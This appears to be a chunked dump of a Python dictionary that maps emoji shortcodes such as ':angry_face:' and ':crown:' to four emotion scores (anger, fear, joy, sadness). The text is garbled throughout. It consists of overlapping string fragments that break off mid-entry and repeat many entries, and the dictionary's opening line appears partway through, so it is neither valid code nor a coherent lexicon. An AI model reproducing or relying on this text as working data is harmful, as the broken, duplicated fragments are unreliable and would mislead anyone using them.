0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336],", "0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\": [0.22,", "0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 0.251, 0.256], \":white_medium_star:\": [0.237, 0.175, 0.29, 0.16], \":dashing_away:\": [0.363,", "0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127],", "0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\":", "0.265], \":school:\": [0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222, 0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002,", "0.35, 0.149, 0.301], \":person_getting_haircut:\": [0.237, 0.215, 0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255],", "\":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\": [0.262, 0.255,", "0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002],", "[0.314, 0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37], \":herb:\": [0.152, 0.282, 0.509,", "0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295], \":yellow_heart:\": [0.158, 0.177, 0.27, 0.262],", "0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\":", "\":telephone:\": [0.257, 0.204, 0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21,", "\":ribbon:\": [0.20199999999999999, 0.203, 0.345, 0.193], \":link:\": [0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998,", "0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205, 0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\":", "\":watch:\": [0.183, 0.276, 0.172, 0.235], \":church:\": [0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003,", "[0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002,", "[0.331, 0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359, 0.22,", "0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251, 0.267, 0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998],", "[0.18100000000000002, 0.359, 0.22, 0.19], \":radio:\": [0.187, 0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002, 0.125, 0.257,", "[0.174, 0.198, 0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225,", "0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\":", "0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\":", "0.289], \":tulip:\": [0.175, 0.245, 0.37, 0.188], \":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\": [0.168,", "[0.20199999999999999, 0.203, 0.345, 0.193], \":link:\": [0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188,", "0.309, 0.149, 0.322], \":ant:\": [0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 0.08800000000000001, 0.063, 0.19899999999999998],", "0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\": [0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109, 0.149, 0.11],", "0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\":", "[0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122,", "0.13699999999999998], \":kissing_face:\": [0.215, 0.171, 0.159, 0.272], \":glowing_star:\": [0.191, 0.215, 0.38, 0.134], \":person_swimming:\": [0.175,", "0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353,", "0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139, 0.129], \":Aries:\": [0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\":", "0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265], \":school:\": [0.15, 0.268, 0.29600000000000004, 0.162],", "0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14],", "\":waving_hand:\": [0.256, 0.252, 0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153], \":speak-no-evil_monkey:\": [0.214, 0.2,", "0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221,", "\":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078,", "\":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002,", "0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359, 0.22, 0.19], \":radio:\": [0.187, 0.222, 0.316, 0.361],", "\":pine_decoration:\": [0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31,", "0.3, 0.29], \":notebook:\": [0.128, 0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361, 0.212, 0.235, 0.228], \":winking_face:\":", "\":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37], \":herb:\": [0.152, 0.282, 0.509, 0.138], \":guard:\": [0.19, 0.23,", "0.14, 0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295],", "\":weary_cat_face:\": [0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092,", "0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055,", "[0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171, 0.155, 0.225,", "0.127], \":dizzy:\": [0.233, 0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\": [0.348,", "0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121], \":tomato:\": [0.284, 0.22, 0.294, 0.23600000000000002],", "# anger, fear, joy, sadness emoji_emotions = { \":person_surfing:\": [0.12, 0.195, 0.08800000000000001, 0.222],", "0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142], \":two_hearts:\": [0.172,", "\":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15,", "0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299], \":downwards_button:\": [0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003,", "0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998],", "0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087,", "0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146], \":pushpin:\":", "0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142], \":two_hearts:\":", "0.179, 0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231],", "[0.19699999999999998, 0.2, 0.221, 0.24], \":ATM_sign:\": [0.128, 0.179, 0.135, 0.171], \":radio_button:\": [0.218, 0.209, 0.158,", "\":movie_camera:\": [0.142, 0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079, 0.151,", "0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217, 0.182, 0.171, 0.302], \":warning:\": [0.264,", "0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17,", "0.127, 0.226], \":house_with_garden:\": [0.115, 0.24, 0.268, 0.153], \":spiral_shell:\": [0.106, 0.301, 0.316, 0.174], \":backhand_index_pointing_right:\":", "\":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\": [0.257, 0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083,", "\":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\": [0.147, 0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29,", "0.133], \":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002], \":night_with_stars:\": [0.09,", "0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\": [0.042,", "0.292], \":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165,", "0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225, 0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138,", "0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": [0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221],", "0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213, 0.142],", "0.142, 0.14], \":hospital:\": [0.128, 0.376, 0.305, 0.184], \":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289], \":wrench:\":", "\":link:\": [0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002,", "[0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154], \":white_flower:\": [0.187, 0.141, 0.19,", "\":dragon_face:\": [0.198, 0.298, 0.205, 0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251,", "0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265], \":school:\": [0.15,", "0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151], \":barber_pole:\": [0.135,", "[0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222, 0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179,", "[0.156, 0.237, 0.429, 0.07], \":page_with_curl:\": [0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062,", "0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\":", "\":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131, 0.326, 0.31], \":open_file_folder:\": [0.213, 0.263,", "0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295], \":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086], \":fast_up_button:\": [0.243,", "\":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079, 0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192,", "0.21, 0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299], \":downwards_button:\":", "0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185],", "0.1, 0.319, 0.145], \":clapper_board:\": [0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 0.22699999999999998],", "[0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259,", "0.302, 0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201],", "[0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301, 0.317,", "[0.249, 0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21,", "0.155, 0.303], \":red_apple:\": [0.251, 0.182, 0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\":", "\":chequered_flag:\": [0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25], \":relieved_face:\": [0.127, 0.182,", "0.354, 0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\": [0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\":", "0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\":", "\":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\": [0.203, 0.243,", "0.292], \":dog_face:\": [0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996,", "[0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998, 0.125,", "0.217, 0.21, 0.22], \":fuel_pump:\": [0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141, 0.156, 0.182, 0.16699999999999998],", "0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998,", "0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257, 0.204, 0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997],", "0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075, 0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276,", "\":running_shirt:\": [0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\": [0.254, 0.267,", "[0.304, 0.242, 0.207, 0.185], \":pine_decoration:\": [0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145,", "0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19, 0.309, 0.226, 0.249],", "\":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19, 0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272,", "\":spouting_whale:\": [0.16, 0.184, 0.09, 0.159], \":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305,", "0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149],", "0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185],", "0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\":", "\":person_bowing:\": [0.256, 0.331, 0.262, 0.299], \":tennis:\": [0.174, 0.198, 0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999,", "0.282, 0.509, 0.138], \":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155],", "0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361, 0.212, 0.235, 0.228], \":winking_face:\": [0.098, 0.053, 0.129, 0.171],", "0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153], \":speak-no-evil_monkey:\": [0.214, 0.2, 0.081, 0.147], \":hot_springs:\": [0.21,", "[0.161, 0.172, 0.175, 0.145], \":school_backpack:\": [0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32,", "\":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306,", "0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215, 0.122], \":sunset:\":", "\":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 0.079], \":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174,", "\":doughnut:\": [0.152, 0.259, 0.136, 0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077,", "0.201, 0.255], \":expressionless_face:\": [0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156], \":sweat_droplets:\":", "0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245, 0.192, 0.034], \":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\":", "0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256, 0.252, 0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153],", "0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196,", "[0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\": [0.165, 0.361, 0.171, 0.282], \":jeans:\": [0.2, 0.109, 0.134,", "[0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998,", "0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16],", "0.162], \":newspaper:\": [0.222, 0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147,", "0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": [0.382, 0.293, 0.21899999999999997, 0.284],", "[0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998,", "0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\": [0.042, 0.128, 0.102, 0.077], \":family:\": [0.249,", "0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185, 0.317, 0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001],", "\":clapper_board:\": [0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\": [0.145, 0.255,", "\":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188,", "0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2,", "0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185, 0.317, 0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\":", "0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256,", "[0.257, 0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121], \":tomato:\": [0.284, 0.22, 0.294,", "0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282, 0.145], \":game_die:\": [0.126, 0.162, 0.09, 0.179],", "\":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335,", "0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002],", "0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156], \":e-mail:\": [0.26, 0.225, 0.21, 0.24], \":black_medium-small_square:\": [0.392,", "0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002],", "0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999], \":green_apple:\": [0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\":", "0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256, 0.252, 0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002,", "0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\":", "0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314,", "0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\":", "\":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998,", "0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\":", "0.179, 0.242], \":goblin:\": [0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\": [0.237, 0.215, 0.266, 0.153], \":Cancer:\":", "\":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001,", "0.139, 0.129], \":Aries:\": [0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106], \":round_pushpin:\":", "0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 0.172, 0.175, 0.145], \":school_backpack:\": [0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\":", "0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\":", "0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273], \":nail_polish:\":", "0.254, 0.23600000000000002], \":up_arrow:\": [0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07], \":page_with_curl:\":", "0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155,", "0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228, 0.128, 0.248],", "\":cherries:\": [0.171, 0.139, 0.155, 0.087], \":electric_plug:\": [0.124, 0.14, 0.078, 0.139], \":cloud:\": [0.18, 0.231,", "\":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203,", "0.276, 0.175, 0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326],", "0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16],", "0.141, 0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18], 